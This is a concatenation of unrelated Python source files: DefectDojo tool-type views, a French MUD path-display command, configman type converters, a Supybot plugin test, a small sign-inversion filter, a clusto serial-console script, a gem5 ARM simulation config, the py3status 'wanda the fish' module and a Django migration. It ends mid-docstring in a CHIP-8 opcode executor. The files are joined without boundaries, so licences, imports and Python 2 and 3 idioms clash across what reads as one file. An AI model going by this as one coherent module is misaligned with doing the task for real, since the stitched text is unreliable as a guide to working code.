logger = logging.getLogger(__name__)


@user_passes_test(lambda u: u.is_staff)
def new_tool_type(request):
    """Staff-only view that creates a new Tool_Type.

    GET renders an empty form; a valid POST saves the form, flashes a
    success message, and redirects to the tool type list.  An invalid POST
    re-renders the bound form with its errors.
    """
    if request.method == 'POST':
        tform = ToolTypeForm(request.POST, instance=Tool_Type())
        if tform.is_valid():
            tform.save()
            messages.add_message(request,
                                 messages.SUCCESS,
                                 'Tool Type Configuration Successfully Created.',
                                 extra_tags='alert-success')
            return HttpResponseRedirect(reverse('tool_type', ))
    else:
        tform = ToolTypeForm()
    # The breadcrumb used to be added only on GET, so re-rendering an
    # invalid POST lost it; add it on every render path (matching
    # edit_tool_type).
    add_breadcrumb(title="New Tool Type Configuration", top_level=False, request=request)
    return render(request, 'dojo/new_tool_type.html',
                  {'tform': tform})


@user_passes_test(lambda u: u.is_staff)
def edit_tool_type(request, ttid):
    """Staff-only view that edits the Tool_Type with primary key ``ttid``."""
    # Local renamed so it no longer shadows the tool_type() view below.
    tt_obj = Tool_Type.objects.get(pk=ttid)
    if request.method == 'POST':
        tform = ToolTypeForm(request.POST, instance=tt_obj)
        if tform.is_valid():
            tform.save()
            messages.add_message(request,
                                 messages.SUCCESS,
                                 'Tool Type Configuration Successfully Updated.',
                                 extra_tags='alert-success')
            return HttpResponseRedirect(reverse('tool_type', ))
    else:
        tform = ToolTypeForm(instance=tt_obj)
    add_breadcrumb(title="Edit Tool Type Configuration", top_level=False, request=request)

    return render(request, 'dojo/edit_tool_type.html', {'tform': tform})


@user_passes_test(lambda u: u.is_staff)
def tool_type(request):
    """Staff-only list of all Tool_Type records, ordered by name."""
    tool_types = Tool_Type.objects.all().order_by('name')
    add_breadcrumb(title="Tool Type List", top_level=not len(request.GET), request=request)
    return render(request, 'dojo/tool_type.html', {'confs': tool_types})

# -*-coding:Utf-8 -*

# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


"""Fichier contenant le paramètre 'voir' de la commande 'chemin'."""

from primaires.format.fonctions import oui_ou_non
from primaires.interpreteur.masque.parametre import Parametre
from primaires.pnj.chemin import FLAGS
class PrmVoir(Parametre):

    """Command 'chemin voir' (path view).

    Displays the details of a PNJ path: which flags are active and the
    rooms and exits it passes through.
    """

    def __init__(self):
        """Constructor: registers the French/English keywords and the schema."""
        Parametre.__init__(self, "voir", "view")
        self.schema = "<cle>"
        self.aide_courte = "affiche le détail d'un chemin"
        self.aide_longue = \
            "Cette commande permet d'obtenir plus d'informations sur " \
            "un chemin (ses flags actifs, ses salles et sorties...)."

    def ajouter(self):
        """Hook called when the command is added to the interpreter."""
        cle = self.noeud.get_masque("cle")
        # Path keys are quoted identifiers of at least 3 chars in [a-z0-9_:].
        cle.proprietes["regex"] = r"'[a-z0-9_:]{3,}'"

    def interpreter(self, personnage, dic_masques):
        """Interpret the parameter: send the path's flags and rooms to the player."""
        cle = dic_masques["cle"].cle
        if cle not in importeur.pnj.chemins:
            personnage << "|err|Ce chemin n'existe pas.|ff|"
            return

        chemin = importeur.pnj.chemins[cle]
        msg = "Détail sur le chemin {} :".format(chemin.cle)
        msg += "\n  Flags :"
        # One line per known flag, with a yes/no ('oui'/'non') marker.
        for nom_flag in FLAGS.keys():
            msg += "\n    {}".format(nom_flag.capitalize())
            msg += " : " + oui_ou_non(chemin.a_flag(nom_flag))
        msg += "\n  Salles du chemin :"
        if len(chemin.salles) == 0:
            msg += "\n    Aucune"
        else:
            # List each room with its outgoing direction, plus the return
            # direction when one is recorded for that room.
            for salle, direction in chemin.salles.items():
                msg += "\n    " + salle.ident.ljust(20) + " "
                msg += direction.ljust(10)
                if salle in chemin.salles_retour and \
                        chemin.salles_retour[salle]:
                    msg += " (retour " + chemin.salles_retour[salle] + ")"

        personnage << msg

#This is where the tests go.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2021 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" This package contains the qibuild actions. """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function

# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is configman
#
# The Initial Developer of the Original Code is
# Mozilla Foundation
# Portions created by the Initial Developer are Copyright (C) 2011
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#    K Lars Lohn, lars@mozilla.com
#    Peter Bengtsson, peterbe@mozilla.com
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****

import sys
import re
import datetime
import types
import inspect
import collections
import json

from required_config import RequiredConfig
from namespace import Namespace

from .datetime_util import datetime_from_ISO_string as datetime_converter
from .datetime_util import date_from_ISO_string as date_converter

import datetime_util


#------------------------------------------------------------------------------
def option_value_str(an_option):
    """Render an option-like object's ``value`` attribute as a string.

    Any object carrying a ``value`` attribute is accepted.  ``None`` maps to
    the empty string; types registered in ``to_string_converters`` use their
    converter; anything else falls back to unicode() (or is returned as-is
    when it is already a string).  Values whose from-string converter is in
    ``converters_requiring_quotes`` are wrapped in triple quotes.
    """
    value = an_option.value
    if value is None:
        return ''
    try:
        s = to_string_converters[type(value)](value)
    except KeyError:
        s = value if isinstance(value, basestring) else unicode(value)
    if an_option.from_string_converter in converters_requiring_quotes:
        s = "'''%s'''" % s
    return s


#------------------------------------------------------------------------------
def str_dict_keys(a_dict):
    """Return a copy of *a_dict* with every unicode key coerced to str.

    Non-unicode keys (including non-string keys such as ints) are left
    untouched; only unicode keys are converted.  This works around the
    Python <= 2.6.4 bug where ``f(**kwargs)`` raises TypeError on unicode
    keyword names, while deliberately not disturbing non-string keys that
    simply pass through ``**kwargs``.
    """
    return dict(
        (str(key) if isinstance(key, unicode) else key, value)
        for key, value in a_dict.items()
    )


#------------------------------------------------------------------------------
def io_converter(input_str):
    """Map 'stdout'/'stderr' (any case) to the corresponding stream, open any
    other string as a file for writing, and pass non-strings through unchanged."""
    if type(input_str) is not str:
        return input_str
    lowered = input_str.lower()
    if lowered == 'stdout':
        return sys.stdout
    if lowered == 'stderr':
        return sys.stderr
    return open(input_str, "w")


#------------------------------------------------------------------------------
def timedelta_converter(input_str):
    """Convert a colon-separated string into a datetime.timedelta.

    Fields are read right-to-left as seconds, minutes, hours, days, so
    '1:2:3:4' is 1 day 2h 3m 4s and '30' is 30 seconds.  Non-string input
    raises ValueError.
    """
    if not isinstance(input_str, basestring):
        raise ValueError(input_str)
    fields = input_str.split(':')
    # Pad missing leading fields (days first, seconds last) with zeros.
    days, hours, minutes, seconds = (
        [0] * (4 - len(fields[-4:])) + [int(f) for f in fields[-4:]]
    )
    return datetime.timedelta(days=days,
                              hours=hours,
                              minutes=minutes,
                              seconds=seconds)


#------------------------------------------------------------------------------
def boolean_converter(input_str):
    """Interpret common truthy spellings case-insensitively.

    Returns True for 'true', 't', '1', 'y', 'yes' (any case); False otherwise.
    """
    truthy_spellings = ("true", "t", "1", "y", "yes")
    return input_str.lower() in truthy_spellings


#------------------------------------------------------------------------------
# Python 2 builtins module; used below to recognise bare builtin names.
import __builtin__
_all_named_builtins = dir(__builtin__)


def class_converter(input_str):
    """ a conversion that will import a module and class name
    """
    # Empty string / None means "no class".
    if not input_str:
        return None
    # Bare builtin names (e.g. 'int', 'str') resolve via eval; the membership
    # test against dir(__builtin__) limits what can be evaluated, but
    # NOTE(review): eval on configuration strings is still risky if the
    # input can come from an untrusted source.
    if '.' not in input_str and input_str in _all_named_builtins:
        return eval(input_str)
    parts = [x.strip() for x in input_str.split('.') if x.strip()]
    try:
        # first try as a complete module
        package = __import__(input_str)
    except ImportError:
        # it must be a class from a module
        if len(parts) == 1:
            # since it has only one part, it must be a class from __main__
            parts = ('__main__', input_str)
        package = __import__('.'.join(parts[:-1]), globals(), locals(), [])
    obj = package
    # __import__ returns the top-level package, so walk the remaining dotted
    # parts down to the requested module/class attribute.
    for name in parts[1:]:
        obj = getattr(obj, name)
    return obj


#------------------------------------------------------------------------------
def classes_in_namespaces_converter(template_for_namespace="cls%d",
                                    name_of_class_option='cls',
                                    instantiate_classes=False):
    """take a comma delimited list of class names, convert each class name
    into an actual class as an option within a numbered namespace.  This
    function creates a closure over a new function.  That new function,
    in turn creates a class derived from RequiredConfig.  The inner function,
    'class_list_converter', populates the InnerClassList with a Namespace for
    each of the classes in the class list.  In addition, it puts each class
    itself into the subordinate Namespace.  The requirement discovery mechanism
    of configman then reads the InnerClassList's required config, pulling in
    the namespaces and associated classes within.

    For example, if we have a class list like this: "Alpha, Beta", then this
    converter will add the following Namespaces and options to the
    configuration:

        "cls0" - the subordinate Namespace for Alpha
        "cls0.cls" - the option containing the class Alpha itself
        "cls1" - the subordinate Namespace for Beta
        "cls1.cls" - the option containing the class Beta itself

    Optionally, the 'class_list_converter' inner function can imbue the
    InnerClassList's subordinate namespaces with aggregates that will
    instantiate classes from the class list.  This is a convenience to the
    programmer who would otherwise have to know ahead of time what the
    namespace names were so that the classes could be instantiated within the
    context of the correct namespace.  Remember the user could completely
    change the list of classes at run time, so prediction could be difficult.

        "cls0" - the subordinate Namespace for Alpha
        "cls0.cls" - the option containing the class Alpha itself
        "cls0.cls_instance" - an instance of the class Alpha
        "cls1" - the subordinate Namespace for Beta
        "cls1.cls" - the option containing the class Beta itself
        "cls1.cls_instance" - an instance of the class Beta

    parameters:
        template_for_namespace - a template for the names of the namespaces
                                 that will contain the classes and their
                                 associated required config options.  The
                                 namespaces will be numbered sequentially.  By
                                 default, they will be "cls0", "cls1", etc.
        name_of_class_option - the name to be used for the class option within
                               the nested namespace.  By default, it will
                               choose: "cls0.cls", "cls1.cls", etc.
        instantiate_classes - a boolean to determine if there should be an
                              aggregator added to each namespace that
                              instantiates each class.  If True, then each
                              Namespace will contain elements for the class, as
                              well as an aggregator that will instantiate the
                              class.
    """

    #--------------------------------------------------------------------------
    def class_list_converter(class_list_str):
        """This function becomes the actual converter used by configman to
        take a string and convert it into the nested sequence of Namespaces,
        one for each class in the list.  It does this by creating a proxy
        class stuffed with its own 'required_config' that's dynamically
        generated."""
        if isinstance(class_list_str, basestring):
            class_list = [x.strip() for x in class_list_str.split(',')]
        else:
            raise TypeError('must be derivative of a basestring')

        #======================================================================
        class InnerClassList(RequiredConfig):
            """This nested class is a proxy list for the classes.  It collects
            all the config requirements for the listed classes and places them
            each into their own Namespace.
            """
            # we're dynamically creating a class here.  The following block of
            # code is actually adding class level attributes to this new class
            required_config = Namespace()  # 1st requirement for configman
            subordinate_namespace_names = []  # to help the programmer know
                                              # what Namespaces we added
            namespace_template = template_for_namespace  # save the template
                                                         # for future reference
            class_option_name = name_of_class_option  # save the class's option
                                                      # name for the future
            # for each class in the class list
            for namespace_index, a_class in enumerate(class_list):
                # figure out the Namespace name
                namespace_name = template_for_namespace % namespace_index
                subordinate_namespace_names.append(namespace_name)
                # create the new Namespace
                required_config[namespace_name] = Namespace()
                # add the option for the class itself
                required_config[namespace_name].add_option(
                  name_of_class_option,
                  #doc=a_class.__doc__  # not helpful if too verbose
                  default=a_class,
                  from_string_converter=class_converter
                )
                if instantiate_classes:
                    # add an aggregator to instantiate the class.
                    # (name_of_class_option is a closure constant, not the
                    # loop variable, so the lambda is safe from late binding)
                    required_config[namespace_name].add_aggregation(
                      "%s_instance" % name_of_class_option,
                      lambda c, lc, a: lc[name_of_class_option](lc))

            @classmethod
            def to_str(cls):
                """this method takes this inner class object and turns it back
                into the original string of classnames.  This is used
                primarily as for the output of the 'help' option"""
                return ', '.join(
                    py_obj_to_str(v[name_of_class_option].value)
                        for v in cls.get_required_config().values()
                        if isinstance(v, Namespace))

        return InnerClassList  # result of class_list_converter
    return class_list_converter  # result of classes_in_namespaces_converter


#------------------------------------------------------------------------------
def regex_converter(input_str):
    """Compile *input_str* into a regular-expression object."""
    compiled = re.compile(input_str)
    return compiled

# The type of a compiled regular expression (the re module exposes no
# public name for it).
compiled_regexp_type = type(re.compile(r'x'))

#------------------------------------------------------------------------------
# Maps a target type to the function used to parse a value of that type from
# a string.  NOTE(review): relies on Python 2 builtins (unicode).
from_string_converters = {
    int: int,
    float: float,
    str: str,
    unicode: unicode,
    bool: boolean_converter,
    dict: json.loads,
    datetime.datetime: datetime_converter,
    datetime.date: date_converter,
    datetime.timedelta: timedelta_converter,
    type: class_converter,
    types.FunctionType: class_converter,
    compiled_regexp_type: regex_converter,
}


#------------------------------------------------------------------------------
def py_obj_to_str(a_thing):
    """Render a Python object (module, class, function) as a dotted name.

    None becomes ''; modules and objects from __builtin__/__main__ use the
    bare name; objects providing to_str() delegate to it; everything else is
    rendered as 'module.name'.
    """
    if a_thing is None:
        return ''
    if inspect.ismodule(a_thing):
        return a_thing.__name__
    if a_thing.__module__ in ('__builtin__', '__main__'):
        return a_thing.__name__
    if hasattr(a_thing, 'to_str'):
        return a_thing.to_str()
    return '%s.%s' % (a_thing.__module__, a_thing.__name__)


#------------------------------------------------------------------------------
def list_to_str(a_list):
    """Render each element with its type's string converter, joined by ', '."""
    pieces = (to_string_converters[type(item)](item) for item in a_list)
    return ', '.join(pieces)

#------------------------------------------------------------------------------
# Maps a value's type to the function used to render it as a string; the
# inverse of from_string_converters.  NOTE(review): Python 2 only (unicode).
to_string_converters = {
    int: str,
    float: str,
    str: str,
    unicode: unicode,
    list: list_to_str,
    tuple: list_to_str,
    bool: lambda x: 'True' if x else 'False',
    dict: json.dumps,
    datetime.datetime: datetime_util.datetime_to_ISO_string,
    datetime.date: datetime_util.date_to_ISO_string,
    datetime.timedelta: datetime_util.timedelta_to_str,
    type: py_obj_to_str,
    types.ModuleType: py_obj_to_str,
    types.FunctionType: py_obj_to_str,
    compiled_regexp_type: lambda x: x.pattern,
}


#------------------------------------------------------------------------------
# Converters whose rendered string must be wrapped in triple quotes when
# echoed back; consumed by option_value_str().
#converters_requiring_quotes = [eval, eval_to_regex_converter]
converters_requiring_quotes = [eval, regex_converter]

###
# Copyright (c) 2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#   * Redistributions of source code must retain the above copyright notice,
#     this list of conditions, and the following disclaimer.
#   * Redistributions in binary form must reproduce the above copyright notice,
#     this list of conditions, and the following disclaimer in the
#     documentation and/or other materials provided with the distribution.
#   * Neither the name of the author of this software nor the name of
#     contributors to this software may be used to endorse or promote products
#     derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###

from supybot.test import *

class MyChannelLoggerTestCase(PluginTestCase):
    """Supybot plugin test case that loads the MyChannelLogger plugin.

    No explicit tests yet; PluginTestCase still verifies the plugin loads.
    """
    plugins = ('MyChannelLogger',)


# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:

#!/usr/bin/env python

import sys

def inv(s):
    """Flip the sign of a signed-number string.

    '-x' -> 'x', '+x' -> '-x', and a plain number 'x' -> '-x'.
    """
    sign, rest = s[0], s[1:]
    if sign == '-':
        return rest
    if sign == '+':
        return '-' + rest
    return '-' + s

# Filter: read 'p'/'s' records from stdin and emit them with the two value
# fields swapped and sign-inverted via inv().  Blank lines pass through.
# NOTE(review): uses Python 2 print statements ("print 'Usage:'", bare
# "print") alongside single-argument print() calls — Python 2 only.
if len(sys.argv) != 1:
  print 'Usage:', sys.argv[0]
  sys.exit(1)

for line in sys.stdin:
  linesplit = line.strip().split()
  if len(linesplit) == 3:
    assert(linesplit[0] == 'p')
    print('p ' + inv(linesplit[2]) + ' ' + linesplit[1])
  elif len(linesplit) == 5:
    assert(linesplit[0] == 's')
    print('s ' + \
          inv(linesplit[2]) + ' ' + linesplit[1] + ' ' + \
          inv(linesplit[4]) + ' ' + linesplit[3] )
  elif len(linesplit) == 0:
    print

def test_default(cookies):
    """Bake the cookiecutter template with default values and check success."""
    res = cookies.bake()

    assert res.exit_code == 0
    assert res.project.isdir()
    assert res.exception is None

#!/usr/bin/env python
# -*- mode: python; sh-basic-offset: 4; indent-tabs-mode: nil; coding: utf-8 -*-
# vim: tabstop=4 softtabstop=4 expandtab shiftwidth=4 fileencoding=utf-8
#
# Shell command
# Copyright 2010, Jeremy Grosser <synack@digg.com>

import argparse
import os
import sys

import clusto
from clusto import script_helper


class Console(script_helper.Script):
    '''
    Use clusto's hardware port mappings to console to a remote server
    using the serial console.
    '''

    def __init__(self):
        script_helper.Script.__init__(self)

    def _add_arguments(self, parser):
        # Default the SSH user to the invoking shell user.
        user = os.environ.get('USER')
        # Fixed: the two adjacent string literals previously concatenated
        # to "...clusto.conf tooin console.user..." (missing space).
        parser.add_argument('--user', '-u', default=user,
            help='SSH User (you can also set this in clusto.conf too '
                 'in console.user: --user > clusto.conf:console.user > "%s")' % user)
        parser.add_argument('server', nargs=1,
            help='Object to console to (IP or name)')

    def add_subparser(self, subparsers):
        parser = self._setup_subparser(subparsers)
        self._add_arguments(parser)

    def run(self, args):
        """Resolve the server object and open its serial console.

        Returns the console() result on success, 1 when the object cannot
        be found, 2 when it has no console capability.
        """
        # args.server is a 1-element list (nargs=1); use the name itself in
        # lookups and messages instead of printing the list repr.
        name = args.server[0]
        try:
            server = clusto.get(name)
            if not server:
                raise LookupError('Object "%s" does not exist' % name)
        except Exception as e:
            self.debug(e)
            self.error('No object like "%s" was found' % name)
            return 1
        server = server[0]

        if not hasattr(server, 'console'):
            self.error('The object %s lacks a console method' % server.name)
            return 2

        user = os.environ.get('USER')
        if args.user:
            # NOTE(review): --user defaults to $USER, so this branch is taken
            # whenever $USER is set and the config fallback below is rarely
            # reached -- confirm this precedence is intended.
            self.debug('Grabbing user from parameter')
            user = args.user
        else:
            self.debug('Grabbing user from config file or default')
            user = self.get_conf('console.user', user)
        self.debug('User is "%s"' % user)
        return(server.console(ssh_user=user))


def main():
    """Script entry point: build the Console script, parse args, and run it."""
    console_script, parsed_args = script_helper.init_arguments(Console)
    return console_script.run(parsed_args)

if __name__ == '__main__':
    sys.exit(main())


from unittest import TestCase

from django.core.management import call_command


class SendAiPicsStatsTestCase(TestCase):
    """Smoke test for the ``send_ai_pics_stats`` management command."""
    def test_run_command(self):
        # The command should complete without raising.
        call_command('send_ai_pics_stats')

# Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder.  You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg

from m5.objects import *
from arm_generic import *
import switcheroo

# Build a full-system Linux ARM simulation whose CPU model can be switched
# at runtime ("switcheroo"); here both switch targets are AtomicSimpleCPU.
root = LinuxArmFSSwitcheroo(
    mem_class=DDR3_1600_x64,
    cpu_classes=(AtomicSimpleCPU, AtomicSimpleCPU)
    ).create_root()

# Setup a custom test method that uses the switcheroo tester that
# switches between CPU models.
run_test = switcheroo.run_test

# -*- coding: utf-8 -*-
"""
Display a fortune-telling, swimming fish.

Wanda has no use what-so-ever. It only takes up disk space and compilation time,
and if loaded, it also takes up precious bar space, memory, and cpu cycles.
Anybody found using it should be promptly sent for a psychiatric evaluation.

Configuration parameters:
    cache_timeout: refresh interval for this module (default 0)
    format: display format for this module
        (default '{nomotion}[{fortune} ]{wanda}{motion}')
    fortune_timeout: refresh interval for fortune (default 60)

Format placeholders:
    {fortune} one of many aphorisms or vague prophecies
    {wanda} name of one of the most commonly kept freshwater aquarium fish
    {motion} biologically propelled motion through a liquid medium
    {nomotion} opposite behavior of motion to prevent modules from shifting

Optional:
    fortune-mod: the fortune cookie program from bsd games

Examples:
```
# disable motions when not in use
wanda_the_fish {
    format = '[\?if=fortune {nomotion}][{fortune} ]'
    format += '{wanda}[\?if=fortune {motion}]'
}

# no updates, no motions, yes fortunes, you click
wanda_the_fish {
    format = '[{fortune} ]{wanda}'
    cache_timeout = -1
}

# wanda moves, fortunes stays
wanda_the_fish {
    format = '[{fortune} ]{nomotion}{wanda}{motion}'
}

# wanda is swimming too fast, slow down wanda
wanda_the_fish {
    cache_timeout = 2
}
```

@author lasers

SAMPLE OUTPUT
[
    {'full_text': 'innovate, v.: To annoy people.'},
    {'full_text': ' <', 'color': '#ffa500'},
    {'full_text': '\xba', 'color': '#add8e6'},
    {'full_text': ',', 'color': '#ff8c00'},
    {'full_text': '))', 'color': '#ffa500'},
    {'full_text': '))>< ', 'color': '#ff8c00'},
]

idle
[
    {'full_text': ' <', 'color': '#ffa500'},
    {'full_text': '\xba', 'color': '#add8e6'},
    {'full_text': ',', 'color': '#ff8c00'},
    {'full_text': '))', 'color': '#ffa500'},
    {'full_text': '))>3', 'color': '#ff8c00'},
]

py3status
[
    {'full_text': 'py3status is so cool!'},
    {'full_text': ' <', 'color': '#ffa500'},
    {'full_text': '\xba', 'color': '#add8e6'},
    {'full_text': ',', 'color': '#ff8c00'},
    {'full_text': '))', 'color': '#ffa500'},
    {'full_text': '))>< ', 'color': '#ff8c00'},
]
"""

from time import time


class Py3status:
    """
    """

    # available configuration parameters
    cache_timeout = 0  # 0: refresh every cycle so the fish animates
    format = "{nomotion}[{fortune} ]{wanda}{motion}"
    fortune_timeout = 60  # seconds between new fortunes

    def post_config_hook(self):
        # Four fish bodies differing only in the tail character %s; cycling
        # through them frame-by-frame animates the tail.
        body = (
            "[\?color=orange&show <"
            "[\?color=lightblue&show º]"
            "[\?color=darkorange&show ,]))"
            "[\?color=darkorange&show ))>%s]]"
        )
        wanda = [body % fin for fin in ("<", ">", "<", "3")]
        self.wanda = [self.py3.safe_format(x) for x in wanda]
        self.wanda_length = len(self.wanda)
        self.index = 0  # current animation frame

        self.fortune_command = ["fortune", "-as"]  # short, printable fortunes
        # Restore persisted state so fortune/toggle survive restarts.
        self.fortune = self.py3.storage_get("fortune") or None
        self.toggled = self.py3.storage_get("toggled") or False
        self.motions = {"motion": " ", "nomotion": ""}

        # deal with {new,old} timeout between storage
        # If the configured fortune_timeout changed since the last run,
        # restart the countdown instead of trusting the stored deadline.
        fortune_timeout = self.py3.storage_get("fortune_timeout")
        timeout = None
        if self.fortune_timeout != fortune_timeout:
            timeout = time() + self.fortune_timeout
        self.time = (
            timeout or self.py3.storage_get("time") or (time() + self.fortune_timeout)
        )

    def _set_fortune(self, state=None, new=False):
        # Three modes:
        #   new=True       -> fetch a fresh fortune now
        #   state=None     -> periodic refresh when toggled on and deadline passed
        #   state=bool     -> user toggle: on fetches, off clears the text
        if not self.fortune_command:
            # fortune binary missing (command failed earlier) -- stay silent
            return
        if new:
            try:
                fortune_data = self.py3.command_output(self.fortune_command)
            except self.py3.CommandError:
                # fortune not installed: blank the text and disable further tries
                self.fortune = ""
                self.fortune_command = None
            else:
                # collapse all whitespace/newlines into single spaces
                self.fortune = " ".join(fortune_data.split())
                self.time = time() + self.fortune_timeout
        elif state is None:
            if self.toggled and time() >= self.time:
                self._set_fortune(new=True)
        else:
            self.toggled = state
            if state:
                self._set_fortune(new=True)
            else:
                self.fortune = None

    def _set_motion(self):
        # Flip each placeholder between "" and " " so the fish appears to
        # wiggle one character left/right per refresh.
        for k in self.motions:
            self.motions[k] = "" if self.motions[k] else " "

    def _set_wanda(self):
        # Advance the animation frame, wrapping at the end.
        self.index += 1
        if self.index >= self.wanda_length:
            self.index = 0

    def wanda_the_fish(self):
        # py3status entry point: advance the animation and render the bar text.
        self._set_fortune()
        self._set_motion()
        self._set_wanda()

        return {
            "cached_until": self.py3.time_in(self.cache_timeout),
            "full_text": self.py3.safe_format(
                self.format,
                {
                    "fortune": self.fortune,
                    "motion": self.motions["motion"],
                    "nomotion": self.motions["nomotion"],
                    "wanda": self.wanda[self.index],
                },
            ),
        }

    def kill(self):
        # Persist state across py3status restarts.
        self.py3.storage_set("toggled", self.toggled)
        self.py3.storage_set("fortune", self.fortune)
        self.py3.storage_set("fortune_timeout", self.fortune_timeout)
        self.py3.storage_set("time", self.time)

    def on_click(self, event):
        # Any click toggles the fortune text on/off.
        if not self.fortune_command:
            return
        self._set_fortune(not self.toggled)


if __name__ == "__main__":
    """
    Run module in test mode.
    """
    # module_test exercises this module standalone, outside the status bar.
    from py3status.module_test import module_test

    module_test(Py3status)

# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-05 14:25
from __future__ import unicode_literals

from django.db import migrations


class Migration(migrations.Migration):
    # Drops the legacy suggestion/rejection columns after the status move in
    # 0049_move_status. RemoveField is destructive: reversing this migration
    # cannot restore the deleted column data.

    dependencies = [("elections", "0049_move_status")]

    operations = [
        migrations.RemoveField(model_name="election", name="rejection_reason"),
        migrations.RemoveField(model_name="election", name="suggested_status"),
        migrations.RemoveField(model_name="election", name="suggestion_reason"),
    ]

from __future__ import print_function
import re

import logging

logging.basicConfig(level=logging.INFO)

class Executor(object):
    """Dispatch 16-bit CHIP-8 opcodes to handler functions.

    ``op_map`` maps 4-character hex patterns to callables: ``?`` matches any
